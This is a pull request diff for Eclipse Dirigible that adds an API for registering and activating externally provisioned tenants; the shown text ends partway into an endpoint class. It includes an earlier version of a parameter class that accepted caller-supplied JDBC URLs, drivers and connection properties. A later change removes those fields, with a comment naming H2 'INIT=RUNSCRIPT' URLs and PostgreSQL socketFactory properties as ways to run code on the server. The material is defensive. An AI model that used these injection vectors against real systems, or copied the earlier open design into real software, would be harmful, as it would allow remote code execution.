### PR TITLE
feat(tenants): a tenant provisioning API for externally provisioned tenants

### DIFF
--- a/components/core/core-base/src/main/java/org/eclipse/dirigible/components/base/endpoint/BaseEndpoint.java
+++ b/components/core/core-base/src/main/java/org/eclipse/dirigible/components/base/endpoint/BaseEndpoint.java
@@ -38,6 +38,16 @@ public abstract class BaseEndpoint {
     /** The Constant PREFIX_ENDPOINT_SECURITY. */
     public static final String PREFIX_ENDPOINT_SECURITY = "services/security/";
 
+    /**
+     * The Constant PREFIX_ENDPOINT_TENANT_PROVISIONING.
+     *
+     * <p>
+     * A prefix of its own, deliberately outside {@code services/data/} and {@code services/security/}:
+     * those carry role gates for the platform's human roles, which would reject a machine-to-machine
+     * token that holds nothing but {@code TENANT_PROVISIONER}.
+     */
+    public static final String PREFIX_ENDPOINT_TENANT_PROVISIONING = "services/tenant-provisioning/";
+
     /** The Constant PREFIX_ENDPOINT_PUBLIC. */
     public static final String PREFIX_ENDPOINT_PUBLIC = "public/";
 

--- a/components/core/core-base/src/main/java/org/eclipse/dirigible/components/base/synchronizer/MultitenantSynchronizers.java
+++ b/components/core/core-base/src/main/java/org/eclipse/dirigible/components/base/synchronizer/MultitenantSynchronizers.java
@@ -1,0 +1,68 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.base.synchronizer;
+
+import java.util.List;
+import java.util.Set;
+import java.util.stream.Collectors;
+
+import org.springframework.stereotype.Component;
+
+/**
+ * The synchronizers whose artefacts are materialized once per tenant.
+ *
+ * <p>
+ * Two features need exactly this set and have to agree on it: the post-provisioning step that
+ * re-triggers a synchronization for a newly provisioned tenant, and the calculation of how far such
+ * a tenant's initialization has got. Deriving it twice would let the two drift apart, and the
+ * failure would be silent - an initialization reported complete because the watcher was looking at
+ * a different set of artefact types than the one being materialized.
+ */
+@Component
+public class MultitenantSynchronizers {
+
+    /** The multitenant synchronizers. */
+    private final List<Synchronizer<?, ?>> synchronizers;
+
+    /** The artefact types they own. */
+    private final Set<String> artefactTypes;
+
+    /**
+     * Instantiates the set from every synchronizer on the classpath.
+     *
+     * @param allSynchronizers all registered synchronizers
+     */
+    MultitenantSynchronizers(List<Synchronizer<?, ?>> allSynchronizers) {
+        this.synchronizers = allSynchronizers.stream()
+                                             .filter(Synchronizer::multitenantExecution)
+                                             .collect(Collectors.toList());
+        this.artefactTypes = this.synchronizers.stream()
+                                               .map(Synchronizer::getArtefactType)
+                                               .collect(Collectors.toSet());
+    }
+
+    /**
+     * The multitenant synchronizers.
+     *
+     * @return the synchronizers
+     */
+    public List<Synchronizer<?, ?>> getSynchronizers() {
+        return synchronizers;
+    }
+
+    /**
+     * The artefact types materialized per tenant, e.g. {@code table} or {@code job}.
+     *
+     * @return the artefact types
+     */
+    public Set<String> getArtefactTypes() {
+        return artefactTypes;
+    }
+}

--- a/components/core/core-initializers/src/main/java/org/eclipse/dirigible/components/initializers/definition/DefinitionRepository.java
+++ b/components/core/core-initializers/src/main/java/org/eclipse/dirigible/components/initializers/definition/DefinitionRepository.java
@@ -9,6 +9,7 @@
  */
 package org.eclipse.dirigible.components.initializers.definition;
 
+import java.util.List;
 import java.util.Set;
 import org.springframework.data.jpa.repository.JpaRepository;
 import org.springframework.data.jpa.repository.Modifying;
@@ -32,6 +33,14 @@ public interface DefinitionRepository extends JpaRepository<Definition, Long> {
     @Transactional
     @Query("update Definition d set d.checksum = :checksum where d.type in :types")
     void updateChecksums(String checksum, Set<String> types);
+
+    /**
+     * Finds every definition of the given artefact types.
+     *
+     * @param types the artefact types
+     * @return the definitions
+     */
+    List<Definition> findByTypeIn(Set<String> types);
 
     /**
      * Initialize checksums.

--- a/components/core/core-initializers/src/main/java/org/eclipse/dirigible/components/initializers/definition/DefinitionService.java
+++ b/components/core/core-initializers/src/main/java/org/eclipse/dirigible/components/initializers/definition/DefinitionService.java
@@ -122,6 +122,17 @@ public class DefinitionService {
     }
 
     /**
+     * Finds every definition of the given artefact types.
+     *
+     * @param types the artefact types
+     * @return the definitions
+     */
+    @Transactional(readOnly = true)
+    public List<Definition> findByTypes(Set<String> types) {
+        return types.isEmpty() ? List.of() : definitionRepository.findByTypeIn(types);
+    }
+
+    /**
      * Update checksums.
      *
      * @param checksum the checksum

--- a/components/core/core-initializers/src/main/java/org/eclipse/dirigible/components/initializers/synchronizer/tenants/RetriggerSynchronizersTenantPostProvisioningStep.java
+++ b/components/core/core-initializers/src/main/java/org/eclipse/dirigible/components/initializers/synchronizer/tenants/RetriggerSynchronizersTenantPostProvisioningStep.java
@@ -9,11 +9,9 @@
  */
 package org.eclipse.dirigible.components.initializers.synchronizer.tenants;
 
-import java.util.List;
 import java.util.Set;
-import java.util.stream.Collectors;
 import org.apache.commons.lang3.StringUtils;
-import org.eclipse.dirigible.components.base.synchronizer.Synchronizer;
+import org.eclipse.dirigible.components.base.synchronizer.MultitenantSynchronizers;
 import org.eclipse.dirigible.components.base.tenant.TenantPostProvisioningStep;
 import org.eclipse.dirigible.components.base.tenant.TenantProvisioningException;
 import org.eclipse.dirigible.components.initializers.definition.DefinitionService;
@@ -32,7 +30,7 @@ class RetriggerSynchronizersTenantPostProvisioningStep implements TenantPostProv
     private static final Logger logger = LoggerFactory.getLogger(RetriggerSynchronizersTenantPostProvisioningStep.class);
 
     /** The multitenant synchronizers. */
-    private final List<Synchronizer<?, ?>> multitenantSynchronizers;
+    private final MultitenantSynchronizers multitenantSynchronizers;
 
     /** The definition service. */
     private final DefinitionService definitionService;
@@ -43,17 +41,15 @@ class RetriggerSynchronizersTenantPostProvisioningStep implements TenantPostProv
     /**
      * Instantiates a new retrigger synchronizers tenant post provisioning step.
      *
-     * @param synchronizers the synchronizers
+     * @param multitenantSynchronizers the multitenant synchronizers
      * @param definitionService the definition service
      * @param synchronizationProcessor the synchronization processor
      */
-    RetriggerSynchronizersTenantPostProvisioningStep(List<Synchronizer<?, ?>> synchronizers, DefinitionService definitionService,
+    RetriggerSynchronizersTenantPostProvisioningStep(MultitenantSynchronizers multitenantSynchronizers, DefinitionService definitionService,
             SynchronizationProcessor synchronizationProcessor) {
         this.definitionService = definitionService;
         this.synchronizationProcessor = synchronizationProcessor;
-        this.multitenantSynchronizers = synchronizers.stream()
-                                                     .filter(Synchronizer::multitenantExecution)
-                                                     .collect(Collectors.toList());
+        this.multitenantSynchronizers = multitenantSynchronizers;
     }
 
     /**
@@ -63,10 +59,10 @@ class RetriggerSynchronizersTenantPostProvisioningStep implements TenantPostProv
      */
     @Override
     public void execute() throws TenantProvisioningException {
-        logger.info("Registered [{}] multitenant synchronizers: [{}]", multitenantSynchronizers.size(), multitenantSynchronizers);
-        Set<String> multitenantArtifactTypes = multitenantSynchronizers.stream()
-                                                                       .map(Synchronizer::getArtefactType)
-                                                                       .collect(Collectors.toSet());
+        logger.info("Registered [{}] multitenant synchronizers: [{}]", multitenantSynchronizers.getSynchronizers()
+                                                                                               .size(),
+                multitenantSynchronizers.getSynchronizers());
+        Set<String> multitenantArtifactTypes = multitenantSynchronizers.getArtefactTypes();
         logger.info("Changing checksums for definitions with types in [{}]", multitenantArtifactTypes);
         definitionService.updateChecksums(StringUtils.EMPTY, multitenantArtifactTypes);
 

--- a/components/core/core-tenants-provisioning/pom.xml
+++ b/components/core/core-tenants-provisioning/pom.xml
@@ -1,0 +1,47 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0"
+	xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+	xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/xsd/maven-4.0.0.xsd">
+	<modelVersion>4.0.0</modelVersion>
+
+	<parent>
+		<groupId>org.eclipse.dirigible</groupId>
+		<artifactId>dirigible-components-parent</artifactId>
+		<version>15.0.0-SNAPSHOT</version>
+		<relativePath>../../pom.xml</relativePath>
+	</parent>
+
+	<name>Components - Core - Tenants Provisioning</name>
+	<artifactId>dirigible-components-core-tenants-provisioning</artifactId>
+	<packaging>jar</packaging>
+
+	<dependencies>
+		<dependency>
+			<groupId>org.eclipse.dirigible</groupId>
+			<artifactId>dirigible-commons-config</artifactId>
+		</dependency>
+		<dependency>
+			<groupId>org.eclipse.dirigible</groupId>
+			<artifactId>dirigible-components-core-base</artifactId>
+		</dependency>
+		<dependency>
+			<groupId>org.eclipse.dirigible</groupId>
+			<artifactId>dirigible-components-core-tenants</artifactId>
+		</dependency>
+		<!-- The initialization status is derived from the synchronizers' own bookkeeping -->
+		<dependency>
+			<groupId>org.eclipse.dirigible</groupId>
+			<artifactId>dirigible-components-core-initializers</artifactId>
+		</dependency>
+		<!-- The tenant's data source is registered from externally created credentials -->
+		<dependency>
+			<groupId>org.eclipse.dirigible</groupId>
+			<artifactId>dirigible-components-data-sources</artifactId>
+		</dependency>
+	</dependencies>
+
+	<properties>
+		<license.header.location>../../../licensing-header.txt</license.header.location>
+		<parent.pom.folder>../../../</parent.pom.folder>
+	</properties>
+
+</project>

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/InitializationStatus.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/InitializationStatus.java
@@ -1,0 +1,28 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+/**
+ * How far the initialization of a tenant has got - what a caller polls after activating it.
+ */
+public enum InitializationStatus {
+
+    /** The tenant is registered but its activation was never requested. */
+    NOT_STARTED,
+
+    /** The tenant is active and its artefacts are still being materialized. */
+    IN_PROGRESS,
+
+    /** Every artefact of the tenant has been materialized. */
+    COMPLETED,
+
+    /** Some artefacts could not be materialized; the detail says which and why. */
+    FAILED
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/RegisterTenantParameter.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/RegisterTenantParameter.java
@@ -1,0 +1,69 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import jakarta.validation.constraints.NotBlank;
+
+/**
+ * The body of a tenant registration.
+ */
+public class RegisterTenantParameter {
+
+    /** The human readable name of the tenant. */
+    @NotBlank(message = "A tenant name is required")
+    private String name;
+
+    /**
+     * The tenant subdomain. Optional - it defaults to the tenant id.
+     *
+     * <p>
+     * The platform requires every tenant to carry a unique subdomain, because that is how the
+     * {@code SUBDOMAIN} resolution strategy finds it. Deployments that resolve tenants from token
+     * groups instead serve every tenant from one host and never look at it, which is why callers may
+     * leave it out; the parameter exists so the API stays usable for a {@code SUBDOMAIN} deployment.
+     */
+    private String subdomain;
+
+    /**
+     * Gets the name.
+     *
+     * @return the name
+     */
+    public String getName() {
+        return name;
+    }
+
+    /**
+     * Sets the name.
+     *
+     * @param name the new name
+     */
+    public void setName(String name) {
+        this.name = name;
+    }
+
+    /**
+     * Gets the subdomain.
+     *
+     * @return the subdomain
+     */
+    public String getSubdomain() {
+        return subdomain;
+    }
+
+    /**
+     * Sets the subdomain.
+     *
+     * @param subdomain the new subdomain
+     */
+    public void setSubdomain(String subdomain) {
+        this.subdomain = subdomain;
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantActivationService.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantActivationService.java
@@ -1,0 +1,214 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import java.util.Set;
+import java.util.concurrent.ExecutorService;
+import java.util.concurrent.Executors;
+import java.util.concurrent.ThreadFactory;
+import java.util.concurrent.atomic.AtomicBoolean;
+
+import org.apache.commons.lang3.StringUtils;
+import org.eclipse.dirigible.components.base.synchronizer.MultitenantSynchronizers;
+import org.eclipse.dirigible.components.base.tenant.TenantPostProvisioningStep;
+import org.eclipse.dirigible.components.initializers.definition.DefinitionService;
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.eclipse.dirigible.components.tenants.domain.TenantStatus;
+import org.eclipse.dirigible.components.tenants.service.TenantService;
+import org.slf4j.Logger;
+import org.slf4j.LoggerFactory;
+import org.springframework.beans.factory.DisposableBean;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.context.annotation.Conditional;
+import org.springframework.http.HttpStatus;
+import org.springframework.stereotype.Service;
+import org.springframework.web.server.ResponseStatusException;
+
+/**
+ * Activates an externally provisioned tenant: makes it real for the platform, then materializes its
+ * artefacts.
+ *
+ * <p>
+ * The order matters. The tenant is moved to {@code PROVISIONED} first and in the request thread,
+ * because the per-tenant fan-out only visits provisioned tenants - a materialization started before
+ * the flip would skip the very tenant it is for.
+ *
+ * <p>
+ * The materialization itself is a full synchronization pass, tens of seconds to minutes, so it runs
+ * on an executor and the caller polls. What the caller must not see in between is a completed
+ * initialization it never waited for, and it would: the derived status reads "everything is
+ * processed" until something says otherwise. So the marking - blanking the checksums of the
+ * per-tenant definitions - happens synchronously, before the response, and the executor only does
+ * the work. The post-provisioning step blanks them again, which is harmless, and that is also why
+ * repeating an activation is safe.
+ */
+@Service
+@Conditional(TenantProvisioningApiEnabledCondition.class)
+class TenantActivationService implements DisposableBean {
+
+    /** The Constant LOGGER. */
+    private static final Logger LOGGER = LoggerFactory.getLogger(TenantActivationService.class);
+
+    /** The tenant service. */
+    private final TenantService tenantService;
+
+    /** The data source registration service. */
+    private final TenantDataSourceRegistrationService dataSourceRegistrationService;
+
+    /** The definition service. */
+    private final DefinitionService definitionService;
+
+    /** The multitenant synchronizers. */
+    private final MultitenantSynchronizers multitenantSynchronizers;
+
+    /** The post provisioning steps. */
+    private final Set<TenantPostProvisioningStep> postProvisioningSteps;
+
+    /**
+     * One pass at a time, and at most one more queued behind it: a synchronization is global, so
+     * running several concurrently would only make them wait on each other, and queueing more than one
+     * would repeat work that the queued pass already covers.
+     */
+    private final ExecutorService executor;
+
+    /** Whether a pass is already queued and has not started yet. */
+    private final AtomicBoolean passQueued = new AtomicBoolean(false);
+
+    /**
+     * Instantiates a new tenant activation service.
+     *
+     * @param tenantService the tenant service
+     * @param dataSourceRegistrationService the data source registration service
+     * @param definitionService the definition service
+     * @param multitenantSynchronizers the multitenant synchronizers
+     * @param postProvisioningSteps the post provisioning steps
+     */
+    @Autowired
+    TenantActivationService(TenantService tenantService, TenantDataSourceRegistrationService dataSourceRegistrationService,
+            DefinitionService definitionService, MultitenantSynchronizers multitenantSynchronizers,
+            Set<TenantPostProvisioningStep> postProvisioningSteps) {
+        this(tenantService, dataSourceRegistrationService, definitionService, multitenantSynchronizers, postProvisioningSteps,
+                Executors.newSingleThreadExecutor(threadFactory()));
+    }
+
+    /**
+     * Instantiates a new tenant activation service with the given executor - the seam the tests use to
+     * run the initialization inline.
+     *
+     * @param tenantService the tenant service
+     * @param dataSourceRegistrationService the data source registration service
+     * @param definitionService the definition service
+     * @param multitenantSynchronizers the multitenant synchronizers
+     * @param postProvisioningSteps the post provisioning steps
+     * @param executor the executor to run initializations on
+     */
+    TenantActivationService(TenantService tenantService, TenantDataSourceRegistrationService dataSourceRegistrationService,
+            DefinitionService definitionService, MultitenantSynchronizers multitenantSynchronizers,
+            Set<TenantPostProvisioningStep> postProvisioningSteps, ExecutorService executor) {
+        this.tenantService = tenantService;
+        this.dataSourceRegistrationService = dataSourceRegistrationService;
+        this.definitionService = definitionService;
+        this.multitenantSynchronizers = multitenantSynchronizers;
+        this.postProvisioningSteps = postProvisioningSteps;
+        this.executor = executor;
+    }
+
+    /**
+     * Activates the tenant and starts its initialization.
+     *
+     * @param tenant the tenant
+     */
+    void activate(Tenant tenant) {
+        if (!dataSourceRegistrationService.isRegistered(tenant)) {
+            throw new ResponseStatusException(HttpStatus.BAD_REQUEST,
+                    "Tenant [" + tenant.getId() + "] cannot be activated before its data source ["
+                            + dataSourceRegistrationService.tenantDataSourceName(tenant) + "] is registered");
+        }
+
+        if (TenantStatus.PROVISIONED != tenant.getStatus()) {
+            LOGGER.info("Activating tenant [{}] - moving it from [{}] to [{}].", tenant.getId(), tenant.getStatus(),
+                    TenantStatus.PROVISIONED);
+            tenant.setStatus(TenantStatus.PROVISIONED);
+            // saving also evicts the tenant caches, so the tenant is resolvable at once
+            tenantService.save(tenant);
+        } else {
+            LOGGER.info("Tenant [{}] is already active. Re-initializing it.", tenant.getId());
+        }
+
+        markArtefactsForReprocessing();
+        scheduleInitialization(tenant.getId());
+    }
+
+    /**
+     * Blanks the checksums of every per-tenant definition, so the next synchronization reprocesses them
+     * and the derived status reports the initialization as running from the moment this call returns.
+     */
+    private void markArtefactsForReprocessing() {
+        Set<String> artefactTypes = multitenantSynchronizers.getArtefactTypes();
+        LOGGER.debug("Marking definitions of types [{}] for reprocessing.", artefactTypes);
+        definitionService.updateChecksums(StringUtils.EMPTY, artefactTypes);
+    }
+
+    /**
+     * Queues the initialization, unless one is already queued: a queued pass has not started yet, so it
+     * will cover this tenant too.
+     *
+     * @param tenantId the tenant whose activation asked for it
+     */
+    private void scheduleInitialization(String tenantId) {
+        if (!passQueued.compareAndSet(false, true)) {
+            LOGGER.info("An initialization is already queued; it will cover tenant [{}] as well.", tenantId);
+            return;
+        }
+        executor.execute(() -> {
+            passQueued.set(false);
+            runPostProvisioningSteps(tenantId);
+        });
+    }
+
+    /**
+     * Runs every post provisioning step. A step that fails must not take the others down with it - the
+     * failure is visible to the caller through the artefacts it left behind.
+     *
+     * @param tenantId the tenant whose activation asked for it
+     */
+    private void runPostProvisioningSteps(String tenantId) {
+        LOGGER.info("Initializing tenants, triggered by the activation of tenant [{}]...", tenantId);
+        for (TenantPostProvisioningStep step : postProvisioningSteps) {
+            try {
+                step.execute();
+            } catch (RuntimeException ex) {
+                LOGGER.error("Post provisioning step [{}] has failed.", step, ex);
+            }
+        }
+        LOGGER.info("Initialization triggered by the activation of tenant [{}] has completed.", tenantId);
+    }
+
+    /**
+     * Destroy.
+     */
+    @Override
+    public void destroy() {
+        executor.shutdownNow();
+    }
+
+    /**
+     * Thread factory.
+     *
+     * @return a factory of named daemon threads, so a running pass never holds up a shutdown
+     */
+    private static ThreadFactory threadFactory() {
+        return runnable -> {
+            Thread thread = new Thread(runnable, "tenant-initialization");
+            thread.setDaemon(true);
+            return thread;
+        };
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceParameter.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceParameter.java
@@ -9,18 +9,29 @@
  */
 package org.eclipse.dirigible.components.tenants.provisioning.external;
 
-import java.util.List;
-
 import jakarta.validation.constraints.NotBlank;
 
 /**
  * The credentials of a tenant's database user, as created by the external provisioner.
  *
  * <p>
- * Only the parts that differ from the application's own default data source are required.
- * Everything else - the URL, the driver, the connection properties - is cloned from that data
- * source, because the tenant lives in the same database as the application; a caller that needs a
- * different one may still override them.
+ * Only the credentials. Everything else that makes up a data source - the URL, the driver, the
+ * connection properties - is cloned from the application's own default data source, exactly as the
+ * built-in provisioner clones it, because the tenant lives in the same database as the application.
+ *
+ * <p>
+ * That is a security boundary, not only a convenience. A JDBC URL and driver properties are
+ * executable surface: an H2 URL can carry {@code INIT=RUNSCRIPT FROM '<url>'} and a PostgreSQL
+ * connection property can name a {@code socketFactory} class, so accepting either from a caller
+ * would turn "may register a tenant's credentials" into "may run code on the application server".
+ * They are therefore not part of this API at all, rather than validated - a caller that sends them
+ * is ignored.
+ *
+ * <p>
+ * There is no way to skip the connectivity check either. An earlier draft offered one, which could
+ * not be honoured: saving a data source definition initializes its pool through a lifecycle
+ * listener, so a caller that opted out still had the connection attempted - and got an unhandled
+ * 500 instead of the 502 the check answers with.
  */
 public class TenantDataSourceParameter {
 
@@ -35,22 +46,6 @@ public class TenantDataSourceParameter {
     /** The schema the provisioner created for this tenant. */
     @NotBlank(message = "A database schema is required")
     private String schema;
-
-    /** The JDBC URL. Optional - defaults to the URL of the application's default data source. */
-    private String url;
-
-    /** The JDBC driver. Optional - defaults to the driver of the application's default data source. */
-    private String driver;
-
-    /** Connection properties. Optional - defaults to those of the application's default data source. */
-    private List<PropertyParameter> properties;
-
-    /**
-     * Whether to open a connection with the supplied credentials before accepting them. On by default:
-     * credentials that do not work are otherwise discovered by the activation that follows, where the
-     * failure looks like a broken application rather than a wrong password.
-     */
-    private Boolean verifyConnectivity;
 
     /**
      * Gets the username.
@@ -104,126 +99,5 @@ public class TenantDataSourceParameter {
      */
     public void setSchema(String schema) {
         this.schema = schema;
-    }
-
-    /**
-     * Gets the url.
-     *
-     * @return the url
-     */
-    public String getUrl() {
-        return url;
-    }
-
-    /**
-     * Sets the url.
-     *
-     * @param url the new url
-     */
-    public void setUrl(String url) {
-        this.url = url;
-    }
-
-    /**
-     * Gets the driver.
-     *
-     * @return the driver
-     */
-    public String getDriver() {
-        return driver;
-    }
-
-    /**
-     * Sets the driver.
-     *
-     * @param driver the new driver
-     */
-    public void setDriver(String driver) {
-        this.driver = driver;
-    }
-
-    /**
-     * Gets the properties.
-     *
-     * @return the properties
-     */
-    public List<PropertyParameter> getProperties() {
-        return properties;
-    }
-
-    /**
-     * Sets the properties.
-     *
-     * @param properties the new properties
-     */
-    public void setProperties(List<PropertyParameter> properties) {
-        this.properties = properties;
-    }
-
-    /**
-     * Whether connectivity should be verified. Defaults to true when the caller says nothing.
-     *
-     * @return true, if connectivity should be verified
-     */
-    public boolean isVerifyConnectivity() {
-        return verifyConnectivity == null || verifyConnectivity;
-    }
-
-    /**
-     * Sets whether connectivity should be verified.
-     *
-     * @param verifyConnectivity the new value
-     */
-    public void setVerifyConnectivity(Boolean verifyConnectivity) {
-        this.verifyConnectivity = verifyConnectivity;
-    }
-
-    /**
-     * A connection property.
-     */
-    public static class PropertyParameter {
-
-        /** The property name. */
-        @NotBlank(message = "A property name is required")
-        private String name;
-
-        /** The property value. */
-        private String value;
-
-        /**
-         * Gets the name.
-         *
-         * @return the name
-         */
-        public String getName() {
-            return name;
-        }
-
-        /**
-         * Sets the name.
-         *
-         * @param name the new name
-         */
-        public void setName(String name) {
-            this.name = name;
-        }
-
-        /**
-         * Gets the value.
-         *
-         * @return the value
-         */
-        public String getValue() {
-            return value;
-        }
-
-        /**
-         * Sets the value.
-         *
-         * @param value the new value
-         */
-        public void setValue(String value) {
-            this.value = value;
-        }
     }
 }

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceParameter.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceParameter.java
@@ -1,0 +1,229 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import java.util.List;
+
+import jakarta.validation.constraints.NotBlank;
+
+/**
+ * The credentials of a tenant's database user, as created by the external provisioner.
+ *
+ * <p>
+ * Only the parts that differ from the application's own default data source are required.
+ * Everything else - the URL, the driver, the connection properties - is cloned from that data
+ * source, because the tenant lives in the same database as the application; a caller that needs a
+ * different one may still override them.
+ */
+public class TenantDataSourceParameter {
+
+    /** The database user the external provisioner created for this tenant. */
+    @NotBlank(message = "A database username is required")
+    private String username;
+
+    /** The password of that user. */
+    @NotBlank(message = "A database password is required")
+    private String password;
+
+    /** The schema the provisioner created for this tenant. */
+    @NotBlank(message = "A database schema is required")
+    private String schema;
+
+    /** The JDBC URL. Optional - defaults to the URL of the application's default data source. */
+    private String url;
+
+    /** The JDBC driver. Optional - defaults to the driver of the application's default data source. */
+    private String driver;
+
+    /** Connection properties. Optional - defaults to those of the application's default data source. */
+    private List<PropertyParameter> properties;
+
+    /**
+     * Whether to open a connection with the supplied credentials before accepting them. On by default:
+     * credentials that do not work are otherwise discovered by the activation that follows, where the
+     * failure looks like a broken application rather than a wrong password.
+     */
+    private Boolean verifyConnectivity;
+
+    /**
+     * Gets the username.
+     *
+     * @return the username
+     */
+    public String getUsername() {
+        return username;
+    }
+
+    /**
+     * Sets the username.
+     *
+     * @param username the new username
+     */
+    public void setUsername(String username) {
+        this.username = username;
+    }
+
+    /**
+     * Gets the password.
+     *
+     * @return the password
+     */
+    public String getPassword() {
+        return password;
+    }
+
+    /**
+     * Sets the password.
+     *
+     * @param password the new password
+     */
+    public void setPassword(String password) {
+        this.password = password;
+    }
+
+    /**
+     * Gets the schema.
+     *
+     * @return the schema
+     */
+    public String getSchema() {
+        return schema;
+    }
+
+    /**
+     * Sets the schema.
+     *
+     * @param schema the new schema
+     */
+    public void setSchema(String schema) {
+        this.schema = schema;
+    }
+
+    /**
+     * Gets the url.
+     *
+     * @return the url
+     */
+    public String getUrl() {
+        return url;
+    }
+
+    /**
+     * Sets the url.
+     *
+     * @param url the new url
+     */
+    public void setUrl(String url) {
+        this.url = url;
+    }
+
+    /**
+     * Gets the driver.
+     *
+     * @return the driver
+     */
+    public String getDriver() {
+        return driver;
+    }
+
+    /**
+     * Sets the driver.
+     *
+     * @param driver the new driver
+     */
+    public void setDriver(String driver) {
+        this.driver = driver;
+    }
+
+    /**
+     * Gets the properties.
+     *
+     * @return the properties
+     */
+    public List<PropertyParameter> getProperties() {
+        return properties;
+    }
+
+    /**
+     * Sets the properties.
+     *
+     * @param properties the new properties
+     */
+    public void setProperties(List<PropertyParameter> properties) {
+        this.properties = properties;
+    }
+
+    /**
+     * Whether connectivity should be verified. Defaults to true when the caller says nothing.
+     *
+     * @return true, if connectivity should be verified
+     */
+    public boolean isVerifyConnectivity() {
+        return verifyConnectivity == null || verifyConnectivity;
+    }
+
+    /**
+     * Sets whether connectivity should be verified.
+     *
+     * @param verifyConnectivity the new value
+     */
+    public void setVerifyConnectivity(Boolean verifyConnectivity) {
+        this.verifyConnectivity = verifyConnectivity;
+    }
+
+    /**
+     * A connection property.
+     */
+    public static class PropertyParameter {
+
+        /** The property name. */
+        @NotBlank(message = "A property name is required")
+        private String name;
+
+        /** The property value. */
+        private String value;
+
+        /**
+         * Gets the name.
+         *
+         * @return the name
+         */
+        public String getName() {
+            return name;
+        }
+
+        /**
+         * Sets the name.
+         *
+         * @param name the new name
+         */
+        public void setName(String name) {
+            this.name = name;
+        }
+
+        /**
+         * Gets the value.
+         *
+         * @return the value
+         */
+        public String getValue() {
+            return value;
+        }
+
+        /**
+         * Sets the value.
+         *
+         * @param value the new value
+         */
+        public void setValue(String value) {
+            this.value = value;
+        }
+    }
+}

--- a/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceProvisioningEndpoint.java
+++ b/components/core/core-tenants-provisioning/src/main/java/org/eclipse/dirigible/components/tenants/provisioning/external/TenantDataSourceProvisioningEndpoint.java
@@ -1,0 +1,69 @@
+/*
+ * Copyright (c) 2010-2026 Eclipse Dirigible contributors
+ *
+ * All rights reserved. This program and the accompanying materials are made available under the
+ * terms of the Eclipse Public License v2.0 which accompanies this distribution, and is available at
+ * http://www.eclipse.org/legal/epl-v20.html
+ *
+ * SPDX-FileCopyrightText: Eclipse Dirigible contributors SPDX-License-Identifier: EPL-2.0
+ */
+package org.eclipse.dirigible.components.tenants.provisioning.external;
+
+import org.eclipse.dirigible.components.base.endpoint.BaseEndpoint;
+import org.eclipse.dirigible.components.tenants.domain.Tenant;
+import org.springframework.context.annotation.Conditional;
+import org.springframework.http.HttpStatus;
+import org.springframework.http.ResponseEntity;
+import org.springframework.web.bind.annotation.PathVariable;
+import org.springframework.web.bind.annotation.PutMapping;
+import org.springframework.web.bind.annotation.RequestBody;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+import jakarta.annotation.security.RolesAllowed;
+import jakarta.validation.Valid;
+
+/**
+ * Registers the data source of an externally provisioned tenant from credentials the provisioner
+ * created itself.
+ */
+@RestController
+@RequestMapping(BaseEndpoint.PREFIX_ENDPOINT_TENANT_PROVISIONING + "tenants/{tenantId}/datasources")
